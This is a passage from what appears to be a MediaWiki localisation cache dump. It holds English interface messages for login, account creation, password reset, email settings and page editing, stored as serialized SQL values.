in\";'),('en','messages:userlogin-resetlink','s:29:\"Forgotten your login details?\";'),('en','messages:userlogin-resetpassword-link','s:21:\"Forgot your password?\";'),('en','messages:helplogin-url','s:65:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Logging_in\";'),('en','messages:userlogin-helplink2','s:20:\"Help with logging in\";'),('en','messages:userlogin-loggedin','s:92:\"You are already logged in as {{GENDER:$1|$1}}.\nUse the form below to log in as another user.\";'),('en','messages:userlogin-createanother','s:22:\"Create another account\";'),('en','messages:createacct-emailrequired','s:13:\"Email address\";'),('en','messages:createacct-emailoptional','s:24:\"Email address (optional)\";'),('en','messages:createacct-email-ph','s:24:\"Enter your email address\";'),('en','messages:createacct-another-email-ph','s:19:\"Enter email address\";'),('en','messages:createaccountmail','s:74:\"Use a temporary random password and send it to the specified email address\";'),('en','messages:createacct-realname','s:20:\"Real name (optional)\";'),('en','messages:createaccountreason','s:7:\"Reason:\";'),('en','messages:createacct-reason','s:6:\"Reason\";'),('en','messages:createacct-reason-ph','s:36:\"Why you are creating another account\";'),('en','messages:createacct-captcha','s:14:\"Security check\";'),('en','messages:createacct-imgcaptcha-help','s:0:\"\";'),('en','messages:createacct-imgcaptcha-ph','s:28:\"Enter the text you see above\";'),('en','messages:createacct-submit','s:19:\"Create your account\";'),('en','messages:createacct-another-submit','s:22:\"Create another account\";'),('en','messages:createacct-benefit-heading','s:40:\"{{SITENAME}} is made by people like you.\";'),('en','messages:createacct-benefit-icon1','s:10:\"icon-edits\";'),('en','messages:createacct-benefit-head1','s:17:\"{{NUMBEROFEDITS}}\";'),('en','messages:createacct-benefit-body1','s:24:\"{{PLURAL:$1|edit|edits}}\";'),('en','messages:createacct-benefit-icon2','s:10:\"icon-pages\";'),('en','messages:createacct-benefit-head2','s:20:\"{{NUMBEROFARTICLES}}\";'),('en','messages:createacct-benefit-body2','s:24:\"{{PLURAL:$1|page|pages}}\";'),('en','messages:createacct-benefit-icon3','s:17:\"icon-contributors\";'),('en','messages:createacct-benefit-head3','s:23:\"{{NUMBEROFACTIVEUSERS}}\";'),('en','messages:createacct-benefit-body3','s:45:\"recent {{PLURAL:$1|contributor|contributors}}\";'),('en','messages:badretype','s:39:\"The passwords you entered do not match.\";'),('en','messages:userexists','s:64:\"Username entered already in use.\nPlease choose a different name.\";'),('en','messages:loginerror','s:11:\"Login error\";'),('en','messages:createacct-error','s:22:\"Account creation error\";'),('en','messages:createaccounterror','s:28:\"Could not create account: $1\";'),('en','messages:nocookiesnew','s:195:\"The user account was created, but you are not logged in.\n{{SITENAME}} uses cookies to log in users.\nYou have cookies disabled.\nPlease enable them, then log in with your new username and password.\";'),('en','messages:nocookieslogin','s:103:\"{{SITENAME}} uses cookies to log in users.\nYou have cookies disabled.\nPlease enable them and try again.\";'),('en','messages:nocookiesfornew','s:134:\"The user account was not created, as we could not confirm its source.\nEnsure you have cookies enabled, reload this page and try again.\";'),('en','messages:nocookiesforlogin','s:22:\"{{int:nocookieslogin}}\";'),('en','messages:noname','s:40:\"You have not specified a valid username.\";'),('en','messages:loginsuccesstitle','s:16:\"Login successful\";'),('en','messages:loginsuccess','s:63:\"You are now logged in to {{SITENAME}} as \"$1\".\";'),('en','messages:nosuchuser','s:139:\"There is no user by the name \"$1\".\nUsernames are case sensitive.\nCheck your spelling, or [[Special:UserLogin/signup|create a new account]].\";'),('en','messages:nosuchusershort','s:55:\"There is no user by the name \"$1\".\nCheck your spelling.\";'),('en','messages:nouserspecified','s:31:\"You have to specify a username.\";'),('en','messages:login-userblocked','s:40:\"This user is blocked. Login not allowed.\";'),('en','messages:wrongpassword','s:45:\"Incorrect password entered.\nPlease try again.\";'),('en','messages:wrongpasswordempty','s:45:\"Password entered was blank.\nPlease try again.\";'),('en','messages:passwordtooshort','s:67:\"Passwords must be at least {{PLURAL:$1|1 character|$1 characters}}.\";'),('en','messages:passwordtoolong','s:72:\"Passwords cannot be longer than {{PLURAL:$1|1 character|$1 characters}}.\";'),('en','messages:password-name-match','s:51:\"Your password must be different from your username.\";'),('en','messages:password-login-forbidden','s:57:\"The use of this username and password has been forbidden.\";'),('en','messages:mailmypassword','s:14:\"Reset password\";'),('en','messages:passwordremindertitle','s:39:\"New temporary password for {{SITENAME}}\";'),('en','messages:passwordremindertext','s:493:\"Someone (probably you, from IP address $1) requested a new\npassword for {{SITENAME}} ($4). A temporary password for user\n\"$2\" has been created and was set to \"$3\". If this was your\nintent, you will need to log in and choose a new password now.\nYour temporary password will expire in {{PLURAL:$5|one day|$5 days}}.\n\nIf someone else made this request, or if you have remembered your password,\nand you no longer wish to change it, you may ignore this message and\ncontinue using your old password.\";'),('en','messages:noemail','s:49:\"There is no email address recorded for user \"$1\".\";'),('en','messages:noemailcreate','s:42:\"You need to provide a valid email address.\";'),('en','messages:passwordsent','s:112:\"A new password has been sent to the email address registered for \"$1\".\nPlease log in again after you receive it.\";'),('en','messages:blocked-mailpassword','s:118:\"Your IP address is blocked from editing, and so is not allowed to use the password recovery function to prevent abuse.\";'),('en','messages:eauthentsent','s:215:\"A confirmation email has been sent to the specified email address.\nBefore any other email is sent to the account, you will have to follow the instructions in the email, to confirm that the account is actually yours.\";'),('en','messages:throttled-mailpassword','s:184:\"A password reset email has already been sent, within the last {{PLURAL:$1|hour|$1 hours}}.\nTo prevent abuse, only one password reset email will be sent per {{PLURAL:$1|hour|$1 hours}}.\";'),('en','messages:loginstart','s:0:\"\";'),('en','messages:loginend','s:0:\"\";'),('en','messages:loginend-https','s:0:\"\";'),('en','messages:signupstart','s:18:\"{{int:loginstart}}\";'),('en','messages:signupend','s:16:\"{{int:loginend}}\";'),('en','messages:signupend-https','s:0:\"\";'),('en','messages:mailerror','s:22:\"Error sending mail: $1\";'),('en','messages:acct_creation_throttle_hit','s:250:\"Visitors to this wiki using your IP address have created {{PLURAL:$1|1 account|$1 accounts}} in the last day, which is the maximum allowed in this time period.\nAs a result, visitors using this IP address cannot create any more accounts at the moment.\";'),('en','messages:emailauthenticated','s:45:\"Your email address was confirmed on $2 at $3.\";'),('en','messages:emailnotauthenticated','s:97:\"Your email address is not yet confirmed.\nNo email will be sent for any of the following features.\";'),('en','messages:noemailprefs','s:72:\"Specify an email address in your preferences for these features to work.\";'),('en','messages:emailconfirmlink','s:26:\"Confirm your email address\";'),('en','messages:invalidemailaddress','s:136:\"The email address cannot be accepted as it appears to have an invalid format.\nPlease enter a well-formatted address or empty that field.\";'),('en','messages:cannotchangeemail','s:55:\"Account email addresses cannot be changed on this wiki.\";'),('en','messages:emaildisabled','s:29:\"This site cannot send emails.\";'),('en','messages:emailsender','s:12:\"{{SITENAME}}\";'),('en','messages:accountcreated','s:15:\"Account created\";'),('en','messages:accountcreatedtext','s:91:\"The user account for [[{{ns:User}}:$1|$1]] ([[{{ns:User talk}}:$1|talk]]) has been created.\";'),('en','messages:createaccount-title','s:33:\"Account creation for {{SITENAME}}\";'),('en','messages:createaccount-text','s:218:\"Someone created an account for your email address on {{SITENAME}} ($4) named \"$2\", with password \"$3\".\nYou should log in and change your password now.\n\nYou may ignore this message, if this account was created in error.\";'),('en','messages:login-throttled','s:81:\"You have made too many recent login attempts.\nPlease wait $1 before trying again.\";'),('en','messages:login-abort-generic','s:37:\"Your login was unsuccessful - Aborted\";'),('en','messages:login-migrated-generic','s:79:\"Your account has been migrated, and your username no longer exist on this wiki.\";'),('en','messages:loginlanguagelabel','s:12:\"Language: $1\";'),('en','messages:loginlanguagelinks','s:153:\"* {{#language:de}}|de\n* {{#language:en}}|en\n* {{#language:eo}}|eo\n* {{#language:fr}}|fr\n* {{#language:es}}|es\n* {{#language:it}}|it\n* {{#language:nl}}|nl\";'),('en','messages:suspicious-userlogout','s:106:\"Your request to log out was denied because it looks like it was sent by a broken browser or caching proxy.\";'),('en','messages:createacct-another-realname-tip','s:117:\"Real name is optional.\nIf you choose to provide it, this will be used for giving the user attribution for their work.\";'),('en','messages:pt-login','s:6:\"Log in\";'),('en','messages:pt-login-button','s:6:\"Log in\";'),('en','messages:pt-createaccount','s:14:\"Create account\";'),('en','messages:pt-userlogout','s:7:\"Log out\";'),('en','messages:pear-mail-error','s:2:\"$1\";'),('en','messages:php-mail-error','s:2:\"$1\";'),('en','messages:php-mail-error-unknown','s:39:\"Unknown error in PHP\'s mail() function.\";'),('en','messages:user-mail-no-addy','s:45:\"Tried to send email without an email address.\";'),('en','messages:user-mail-no-body','s:61:\"Tried to send email with an empty or unreasonably short body.\";'),('en','messages:changepassword','s:15:\"Change password\";'),('en','messages:changepassword-summary','s:0:\"\";'),('en','messages:resetpass_announce','s:50:\"To finish logging in, you must set a new password.\";'),('en','messages:resetpass_text','s:22:\"\";'),('en','messages:resetpass_header','s:23:\"Change account password\";'),('en','messages:oldpassword','s:13:\"Old password:\";'),('en','messages:newpassword','s:13:\"New password:\";'),('en','messages:retypenew','s:20:\"Retype new password:\";'),('en','messages:resetpass_submit','s:23:\"Set password and log in\";'),('en','messages:changepassword-success','s:44:\"Your password has been changed successfully!\";'),('en','messages:changepassword-throttled','s:81:\"You have made too many recent login attempts.\nPlease wait $1 before trying again.\";'),('en','messages:resetpass_forbidden','s:27:\"Passwords cannot be changed\";'),('en','messages:resetpass-no-info','s:51:\"You must be logged in to access this page directly.\";'),('en','messages:resetpass-submit-loggedin','s:15:\"Change password\";'),('en','messages:resetpass-submit-cancel','s:6:\"Cancel\";'),('en','messages:resetpass-wrong-oldpass','s:133:\"Invalid temporary or current password.\nYou may have already successfully changed your password or requested a new temporary password.\";'),('en','messages:resetpass-recycled','s:73:\"Please reset your password to something other than your current password.\";'),('en','messages:resetpass-temp-emailed','s:100:\"You logged in with a temporary emailed code.\nTo finish logging in, you must set a new password here:\";'),('en','messages:resetpass-temp-password','s:19:\"Temporary password:\";'),('en','messages:resetpass-abort-generic','s:49:\"Password change has been aborted by an extension.\";'),('en','messages:resetpass-expired','s:63:\"Your password has expired. Please set a new password to log in.\";'),('en','messages:resetpass-expired-soft','s:144:\"Your password has expired and needs to be reset. Please choose a new password now, or click \"{{int:resetpass-submit-cancel}}\" to reset it later.\";'),('en','messages:resetpass-validity-soft','s:127:\"Your password is not valid: $1\n\nPlease choose a new password now, or click \"{{int:resetpass-submit-cancel}}\" to reset it later.\";'),('en','messages:passwordreset','s:14:\"Reset password\";'),('en','messages:passwordreset-text-one','s:61:\"Complete this form to receive a temporary password via email.\";'),('en','messages:passwordreset-text-many','s:82:\"{{PLURAL:$1|Fill in one of the fields to receive a temporary password via email.}}\";'),('en','messages:passwordreset-legend','s:14:\"Reset password\";'),('en','messages:passwordreset-disabled','s:48:\"Password resets have been disabled on this wiki.\";'),('en','messages:passwordreset-emaildisabled','s:47:\"Email features have been disabled on this wiki.\";'),('en','messages:passwordreset-username','s:9:\"Username:\";'),('en','messages:passwordreset-domain','s:7:\"Domain:\";'),('en','messages:passwordreset-capture','s:25:\"View the resulting email?\";'),('en','messages:passwordreset-capture-help','s:118:\"If you check this box, the email (with the temporary password) will be shown to you as well as being sent to the user.\";'),('en','messages:passwordreset-email','s:14:\"Email address:\";'),('en','messages:passwordreset-emailtitle','s:31:\"Account details on {{SITENAME}}\";'),('en','messages:passwordreset-emailtext-ip','s:545:\"Someone (probably you, from IP address $1) requested a reset of your\npassword for {{SITENAME}} ($4). The following user {{PLURAL:$3|account is|accounts are}}\nassociated with this email address:\n\n$2\n\n{{PLURAL:$3|This temporary password|These temporary passwords}} will expire in {{PLURAL:$5|one day|$5 days}}.\nYou should log in and choose a new password now. If someone else made this\nrequest, or if you have remembered your original password, and you no longer\nwish to change it, you may ignore this message and continue using your old\npassword.\";'),('en','messages:passwordreset-emailtext-user','s:526:\"User $1 on {{SITENAME}} requested a reset of your password for {{SITENAME}}\n($4). The following user {{PLURAL:$3|account is|accounts are}} associated with this email address:\n\n$2\n\n{{PLURAL:$3|This temporary password|These temporary passwords}} will expire in {{PLURAL:$5|one day|$5 days}}.\nYou should log in and choose a new password now. If someone else made this\nrequest, or if you have remembered your original password, and you no longer\nwish to change it, you may ignore this message and continue using your old\npassword.\";'),('en','messages:passwordreset-emailelement','s:35:\"Username: $1\nTemporary password: $2\";'),('en','messages:passwordreset-emailsent','s:37:\"A password reset email has been sent.\";'),('en','messages:passwordreset-emailsent-capture','s:59:\"A password reset email has been sent, which is shown below.\";'),('en','messages:passwordreset-emailerror-capture','s:111:\"A password reset email was generated, which is shown below, but sending it to the {{GENDER:$2|user}} failed: $1\";'),('en','messages:changeemail','s:20:\"Change email address\";'),('en','messages:changeemail-summary','s:0:\"\";'),('en','messages:changeemail-text','s:109:\"Complete this form to change your email address. You will need to enter your password to confirm this change.\";'),('en','messages:changeemail-no-info','s:51:\"You must be logged in to access this page directly.\";'),('en','messages:changeemail-oldemail','s:22:\"Current email address:\";'),('en','messages:changeemail-newemail','s:18:\"New email address:\";'),('en','messages:changeemail-none','s:6:\"(none)\";'),('en','messages:changeemail-password','s:27:\"Your {{SITENAME}} password:\";'),('en','messages:changeemail-submit','s:12:\"Change email\";'),('en','messages:changeemail-throttled','s:74:\"You have made too many login attempts.\nPlease wait $1 before trying again.\";'),('en','messages:resettokens','s:12:\"Reset tokens\";'),('en','messages:resettokens-summary','s:0:\"\";'),('en','messages:resettokens-text','s:202:\"You can reset tokens which allow access to certain private data associated with your account here.\n\nYou should do it if you accidentally shared them with someone or if your account has been compromised.\";'),('en','messages:resettokens-no-tokens','s:29:\"There are no tokens to reset.\";'),('en','messages:resettokens-legend','s:12:\"Reset tokens\";'),('en','messages:resettokens-tokens','s:7:\"Tokens:\";'),('en','messages:resettokens-token-label','s:22:\"$1 (current value: $2)\";'),('en','messages:resettokens-watchlist-token','s:93:\"Token for the web feed (Atom/RSS) of [[Special:Watchlist|changes to pages on your watchlist]]\";'),('en','messages:resettokens-done','s:13:\"Tokens reset.\";'),('en','messages:resettokens-resetbutton','s:21:\"Reset selected tokens\";'),('en','messages:bold_sample','s:9:\"Bold text\";'),('en','messages:bold_tip','s:9:\"Bold text\";'),('en','messages:italic_sample','s:11:\"Italic text\";'),('en','messages:italic_tip','s:11:\"Italic text\";'),('en','messages:link_sample','s:10:\"Link title\";'),('en','messages:link_tip','s:13:\"Internal link\";'),('en','messages:extlink_sample','s:33:\"http://www.example.com link title\";'),('en','messages:extlink_tip','s:39:\"External link (remember http:// prefix)\";'),('en','messages:headline_sample','s:13:\"Headline text\";'),('en','messages:headline_tip','s:16:\"Level 2 headline\";'),('en','messages:nowiki_sample','s:30:\"Insert non-formatted text here\";'),('en','messages:nowiki_tip','s:22:\"Ignore wiki formatting\";'),('en','messages:image_sample','s:11:\"Example.jpg\";'),('en','messages:image_tip','s:13:\"Embedded file\";'),('en','messages:media_sample','s:11:\"Example.ogg\";'),('en','messages:media_tip','s:9:\"File link\";'),('en','messages:sig_tip','s:29:\"Your signature with timestamp\";'),('en','messages:hr_tip','s:31:\"Horizontal line (use sparingly)\";'),('en','messages:summary','s:8:\"Summary:\";'),('en','messages:subject','s:17:\"Subject/headline:\";'),('en','messages:minoredit','s:20:\"This is a minor edit\";'),('en','messages:watchthis','s:15:\"Watch this page\";'),('en','messages:savearticle','s:9:\"Save page\";'),('en','messages:preview','s:7:\"Preview\";'),('en','messages:showpreview','s:12:\"Show preview\";'),('en','messages:showdiff','s:12:\"Show changes\";'),('en','messages:blankarticle','s:149:\"Warning: The page you are creating is blank.\nIf you click \"{{int:savearticle}}\" again, the page will be created without any content.\";'),('en','messages:anoneditwarning','s:267:\"Warning: You are not logged in. Your IP address will be publicly visible if you make any edits. If you [$1 log in] or [$2 create an account], your edits will be attributed to your username, along with other benefits.\";'),('en','messages:anonpreviewwarning','s:95:\"You are not logged in. Saving will record your IP address in this page\'s edit history.\";'),('en','messages:missingsummary','s:144:\"Reminder: You have not provided an edit summary.\nIf you click \"{{int:savearticle}}\" again, your edit will be saved without one.\";'),('en','messages:missingcommenttext','s:29:\"Please enter a comment below.\";'),('en','messages:missingcommentheader','s:164:\"Reminder: You have not provided a subject/headline for this comment.\nIf you click \"{{int:savearticle}}\" again, your edit will be saved without one.\";'),('en','messages:summary-preview','s:16:\"Summary preview:\";'),('en','messages:subject-preview','s:25:\"Subject/headline preview:\";'),('en','messages:blockedtitle','s:15:\"User is blocked\";'),('en','messages:blockedtext','s:588:\"Your username or IP address has been blocked.\n\nThe block was made by $1.\nThe reason given is $2.\n\n* Start of block: $8\n* Expiry of block: $6\n* Intended blockee: $7\n\nYou can contact $1 or another [[{{MediaWiki:Grouppage-sysop}}|administrator]] to discuss the block.\nYou cannot use the \"email this user\" feature unless a valid email address is specified in your [[Special:Preferences|account preferences]] and you have not been blocked from using it.\nYour current IP address is $3, and the block ID is #$5.\nPlease include all above details in any queries you make.\";'),('en','messages:autoblockedtext','s:634:\"Your IP address has been automatically blocked because it was used by another user, who was blocked by $1.\nThe reason given is:\n\n:$2\n\n* Start of block: $8\n* Expiry of block: $6\n* Intended blockee: $7\n\nYou may contact $1 or one of the other [[{{MediaWiki:Grouppage-sysop}}|administrators]] to discuss the block.\n\nNote that you may not use the \"email this user\" feature unless you have a valid email address registered in your [[Special:Preferences|user preferences]] and you have not been blocked from using it.\n\nYour current IP address is $3, and the block ID is #$5.\nPlease include all above details in any queries you make.\";'),('en','messages:blockednoreason','s:15:\"no reason given\";'),('en','messages:whitelistedittext','s:24:\"Please $1 to edit pages.\";'),('en','messages:confirmedittext','s:155:\"You must confirm your email address before editing pages.\nPlease set and validate your email address through your [[Special:Preferences|user preferences]].\";'),('en','messages:nosuchsectiontitle','s:19:\"Cannot find section\";'),('en','messages:nosuchsectiontext','s:115:\"You tried to edit a section that does not exist.\nIt may have been moved or deleted while you were viewing the page.\";'),('en','messages:loginreqtitle','s:14:\"Login required\";'),('en','messages:loginreqlink','s:6:\"log in\";'),('en','messages:loginreqpagetext','s:30:\"Please $1 to view other pages.\";'),('en','messages:accmailtitle','s:13:\"Password sent\";'),('en','messages:accmailtext','s:173:\"A randomly generated password for [[User talk:$1|$1]] has been sent to $2. It can be changed on the [[Special:ChangePassword|change password]] page upon logging in.\";'),('en','messages:newarticle','s:5:\"(New)\";'),('en','messages:newarticletext','s:228:\"You have followed a link to a page that does not exist yet.\nTo create the page, start typing in the box below (see the [$1 help page] for more info).\nIf you are here by mistake, click your browser\'s back button.\";'),('en','messages:newarticletextanon','s:25:\"{{int:newarticletext|$1}}\";'),('en','messages:talkpagetext','s:31:\"\";'),('en','messages:anontalkpagetext','s:475:\"----\nThis is the discussion page for an anonymous user who has not created an account yet, or who does not use it.\nWe therefore have to use the numerical IP address to identify him/her.\nSuch an IP address can be shared by several users.\nIf you are an anonymous user and feel that irrelevant comments have been directed at you, please [[Special:UserLogin/signup|create an account]] or [[Special:UserLogin|log in]] to avoid future confusion with other anonymous users.\";'),('en','messages:noarticletext','s:296:\"There is currently no text in this page.\nYou can [[Special:Search/{{PAGENAME}}|search for this page title]] in other pages,\n[{{fullurl:{{#Special:Log}}|page={{FULLPAGENAMEE}}}} search the related logs],\nor [{{fullurl:{{FULLPAGENAME}}|action=edit}} edit this page].\";'),('en','messages:noarticletext-nopermission','s:289:\"There is currently no text in this page.\nYou can [[Special:Search/{{PAGENAME}}|search for this page title]] in other pages, or [{{fullurl:{{#Special:Log}}|page={{FULLPAGENAMEE}}}} search the related logs], but you do not have permission to create this page.\";'),('en','messages:noarticletextanon','s:21:\"{{int:noarticletext}}\";'),('en','messages:missing-revision','s:267:\"The revision #$1 of the page named \"{{FULLPAGENAME}}\" does not exist.\n\nThis is usually caused by following an outdated history link to a page that has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:userpage-userdoesnotexist','s:87:\"User account \"$1\" is not registered.\nPlease check if you want to create/edit this page.\";'),('en','messages:userpage-userdoesnotexist-view','s:36:\"User account \"$1\" is not registered.\";'),('en','messages:blocked-notice-logextract','s:91:\"This user is currently blocked.\nThe latest block log entry is provided below for reference:\";'),('en','messages:clearyourcache','s:553:\"Note: After saving, you may have to bypass your browser\'s cache to see the changes.\n* Firefox / Safari: Hold Shift while clicking Reload, or press either Ctrl-F5 or Ctrl-R (⌘-R on a Mac)\n* Google Chrome: Press Ctrl-Shift-R (⌘-Shift-R on a Mac)\n* Internet Explorer: Hold Ctrl while clicking Refresh, or press Ctrl-F5\n* Opera: Clear the cache in Tools → Preferences\";'),('en','messages:usercssyoucanpreview','s:94:\"Tip: Use the \"{{int:showpreview}}\" button to test your new CSS before saving.\";'),('en','messages:userjsyoucanpreview','s:101:\"Tip: Use the \"{{int:showpreview}}\" button to test your new JavaScript before saving.\";'),('en','messages:usercsspreview','s:96:\"Remember that you are only previewing your user CSS.\nIt has not yet been saved!\";'),('en','messages:userjspreview','s:111:\"Remember that you are only testing/previewing your user JavaScript.\nIt has not yet been saved!\";'),('en','messages:sitecsspreview','s:91:\"Remember that you are only previewing this CSS.\nIt has not yet been saved!\";'),('en','messages:sitejspreview','s:103:\"Remember that you are only previewing this JavaScript code.\nIt has not yet been saved!\";'),('en','messages:userinvalidcssjstitle','s:171:\"Warning: There is no skin \"$1\".\nCustom .css and .js pages use a lowercase title, e.g. {{ns:user}}:Foo/vector.css as opposed to {{ns:user}}:Foo/Vector.css.\";'),('en','messages:updated','s:9:\"(Updated)\";'),('en','messages:note','s:22:\"Note:\";'),('en','messages:previewnote','s:92:\"Remember that this is only a preview.\nYour changes have not yet been saved!\";'),('en','messages:continue-editing','s:18:\"Go to editing area\";'),('en','messages:previewconflict','s:102:\"This preview reflects the text in the upper text editing area as it will appear if you choose to save.\";'),('en','messages:session_fail_preview','s:190:\"Sorry! We could not process your edit due to a loss of session data.\nPlease try again.\nIf it still does not work, try [[Special:UserLogout|logging out]] and logging back in.\";'),('en','messages:session_fail_preview_html','s:365:\"Sorry! We could not process your edit due to a loss of session data.\n\nBecause {{SITENAME}} has raw HTML enabled, the preview is hidden as a precaution against JavaScript attacks.\n\nIf this is a legitimate edit attempt, please try again.\nIf it still does not work, try [[Special:UserLogout|logging out]] and logging back in.\";'),('en','messages:token_suffix_mismatch','s:270:\"Your edit has been rejected because your client mangled the punctuation characters in the edit token.\nThe edit has been rejected to prevent corruption of the page text.\nThis sometimes happens when you are using a buggy web-based anonymous proxy service.\";'),('en','messages:edit_form_incomplete','s:125:\"Some parts of the edit form did not reach the server; double-check that your edits are intact and try again.\";'),('en','messages:editing','s:10:\"Editing $1\";'),('en','messages:creating','s:11:\"Creating $1\";'),('en','messages:editingsection','s:20:\"Editing $1 (section)\";'),('en','messages:editingcomment','s:24:\"Editing $1 (new section)\";'),('en','messages:editconflict','s:17:\"Edit conflict: $1\";'),('en','messages:explainconflict','s:344:\"Someone else has changed this page since you started editing it.\nThe upper text area contains the page text as it currently exists.\nYour changes are shown in the lower text area.\nYou will have to merge your changes into the existing text.\nOnly the text in the upper text area will be saved when you press \"{{int:savearticle}}\".\";'),('en','messages:yourtext','s:9:\"Your text\";'),('en','messages:storedversion','s:15:\"Stored revision\";'),('en','messages:nonunicodebrowser','s:195:\"Warning: Your browser is not Unicode compliant.\nA workaround is in place to allow you to safely edit pages: Non-ASCII characters will appear in the edit box as hexadecimal codes.\";'),('en','messages:editingold','s:146:\"Warning: You are editing an out-of-date revision of this page.\nIf you save it, any changes made since this revision will be lost.\";'),('en','messages:yourdiff','s:11:\"Differences\";'),('en','messages:copyrightwarning','s:417:\"Please note that all contributions to {{SITENAME}} are considered to be released under the $2 (see $1 for details).\nIf you do not want your writing to be edited mercilessly and redistributed at will, then do not submit it here.
                                                                \nYou are also promising us that you wrote this yourself, or copied it from a public domain or similar free resource.\nDo not submit copyrighted work without permission!\";'),('en','messages:copyrightwarning2','s:405:\"Please note that all contributions to {{SITENAME}} may be edited, altered, or removed by other contributors.\nIf you do not want your writing to be edited mercilessly, then do not submit it here.
                                                                \nYou are also promising us that you wrote this yourself, or copied it from a public domain or similar free resource (see $1 for details).\nDo not submit copyrighted work without permission!\";'),('en','messages:editpage-head-copy-warn','s:1:\"-\";'),('en','messages:editpage-tos-summary','s:1:\"-\";'),('en','messages:longpage-hint','s:1:\"-\";'),('en','messages:longpageerror','s:197:\"Error: The text you have submitted is {{PLURAL:$1|one kilobyte|$1 kilobytes}} long, which is longer than the maximum of {{PLURAL:$2|one kilobyte|$2 kilobytes}}.\nIt cannot be saved.\";'),('en','messages:readonlywarning','s:268:\"Warning: The database has been locked for maintenance, so you will not be able to save your edits right now.\nYou may wish to copy and paste your text into a text file and save it for later.\n\nThe administrator who locked it offered this explanation: $1\";'),('en','messages:protectedpagewarning','s:170:\"Warning: This page has been protected so that only users with administrator privileges can edit it.\nThe latest log entry is provided below for reference:\";'),('en','messages:semiprotectedpagewarning','s:148:\"Note: This page has been protected so that only registered users can edit it.\nThe latest log entry is provided below for reference:\";'),('en','messages:cascadeprotectedwarning','s:199:\"Warning: This page has been protected so that only users with administrator privileges can edit it because it is included in the following cascade-protected {{PLURAL:$1|page|pages}}:\";'),('en','messages:titleprotectedwarning','s:185:\"Warning: This page has been protected so that [[Special:ListGroupRights|specific rights]] are needed to create it.\nThe latest log entry is provided below for reference:\";'),('en','messages:templatesused','s:51:\"{{PLURAL:$1|Template|Templates}} used on this page:\";'),('en','messages:templatesusedpreview','s:54:\"{{PLURAL:$1|Template|Templates}} used in this preview:\";'),('en','messages:templatesusedsection','s:54:\"{{PLURAL:$1|Template|Templates}} used in this section:\";'),('en','messages:template-protected','s:11:\"(protected)\";'),('en','messages:template-semiprotected','s:16:\"(semi-protected)\";'),('en','messages:hiddencategories','s:78:\"This page is a member of {{PLURAL:$1|1 hidden category|$1 hidden categories}}:\";'),('en','messages:edittools','s:61:\"\";'),('en','messages:edittools-upload','s:1:\"-\";'),('en','messages:nocreatetext','s:157:\"{{SITENAME}} has restricted the ability to create new pages.\nYou can go back and edit an existing page, or [[Special:UserLogin|log in or create an account]].\";'),('en','messages:nocreate-loggedin','s:47:\"You do not have permission to create new pages.\";'),('en','messages:sectioneditnotsupported-title','s:29:\"Section editing not supported\";'),('en','messages:sectioneditnotsupported-text','s:46:\"Section editing is not supported in this page.\";'),('en','messages:permissionserrors','s:16:\"Permission error\";'),('en','messages:permissionserrorstext','s:86:\"You do not have permission to do that, for the following {{PLURAL:$1|reason|reasons}}:\";'),('en','messages:permissionserrorstext-withaction','s:81:\"You do not have permission to $2, for the following {{PLURAL:$1|reason|reasons}}:\";'),('en','messages:recreate-moveddeleted-warn','s:233:\"Warning: You are recreating a page that was previously deleted.\n\nYou should consider whether it is appropriate to continue editing this page.\nThe deletion and move log for this page are provided here for convenience:\";'),('en','messages:moveddeleted-notice','s:100:\"This page has been deleted.\nThe deletion and move log for the page are provided below for reference.\";'),('en','messages:log-fulllog','s:13:\"View full log\";'),('en','messages:edit-hook-aborted','s:45:\"Edit aborted by hook.\nIt gave no explanation.\";'),('en','messages:edit-gone-missing','s:59:\"Could not update the page.\nIt appears to have been deleted.\";'),('en','messages:edit-conflict','s:14:\"Edit conflict.\";'),('en','messages:edit-no-change','s:61:\"Your edit was ignored because no change was made to the text.\";'),('en','messages:postedit-confirmation-created','s:26:\"The page has been created.\";'),('en','messages:postedit-confirmation-restored','s:27:\"The page has been restored.\";'),('en','messages:postedit-confirmation-saved','s:20:\"Your edit was saved.\";'),('en','messages:edit-already-exists','s:47:\"Could not create a new page.\nIt already exists.\";'),('en','messages:addsection-preload','s:0:\"\";'),('en','messages:addsection-editintro','s:0:\"\";'),('en','messages:defaultmessagetext','s:20:\"Default message text\";'),('en','messages:content-failed-to-parse','s:43:\"Failed to parse $2 content for $1 model: $3\";'),('en','messages:invalid-content-data','s:20:\"Invalid content data\";'),('en','messages:content-not-allowed-here','s:42:\"\"$1\" content is not allowed on page [[$2]]\";'),('en','messages:editwarning-warning','s:177:\"Leaving this page may cause you to lose any changes you have made.\nIf you are logged in, you can disable this warning in the \"{{int:prefs-editing}}\" section of your preferences.\";'),('en','messages:editpage-notsupportedcontentformat-title','s:28:\"Content format not supported\";'),('en','messages:editpage-notsupportedcontentformat-text','s:63:\"The content format $1 is not supported by the content model $2.\";'),('en','messages:content-model-wikitext','s:8:\"wikitext\";'),('en','messages:content-model-text','s:10:\"plain text\";'),('en','messages:content-model-javascript','s:10:\"JavaScript\";'),('en','messages:content-model-css','s:3:\"CSS\";'),('en','messages:expensive-parserfunction-warning','s:194:\"Warning: This page contains too many expensive parser function calls.\n\nIt should have less than $2 {{PLURAL:$2|call|calls}}, there {{PLURAL:$1|is now $1 call|are now $1 calls}}.\";'),('en','messages:expensive-parserfunction-category','s:51:\"Pages with too many expensive parser function calls\";'),('en','messages:post-expand-template-inclusion-warning','s:98:\"Warning: Template include size is too large.\nSome templates will not be included.\";'),('en','messages:post-expand-template-inclusion-category','s:45:\"Pages where template include size is exceeded\";'),('en','messages:post-expand-template-argument-warning','s:147:\"Warning: This page contains at least one template argument that has a too large expansion size.\nThese arguments have been omitted.\";'),('en','messages:post-expand-template-argument-category','s:43:\"Pages containing omitted template arguments\";'),('en','messages:parser-template-loop-warning','s:30:\"Template loop detected: [[$1]]\";'),('en','messages:parser-template-recursion-depth-warning','s:44:\"Template recursion depth limit exceeded ($1)\";'),('en','messages:language-converter-depth-warning','s:44:\"Language converter depth limit exceeded ($1)\";'),('en','messages:node-count-exceeded-category','s:34:\"Pages where node count is exceeded\";'),('en','messages:node-count-exceeded-category-desc','s:40:\"The page exceeds the maximum node count.\";'),('en','messages:node-count-exceeded-warning','s:28:\"Page exceeded the node count\";'),('en','messages:expansion-depth-exceeded-category','s:39:\"Pages where expansion depth is exceeded\";'),('en','messages:expansion-depth-exceeded-category-desc','s:45:\"The page exceeds the maximum expansion 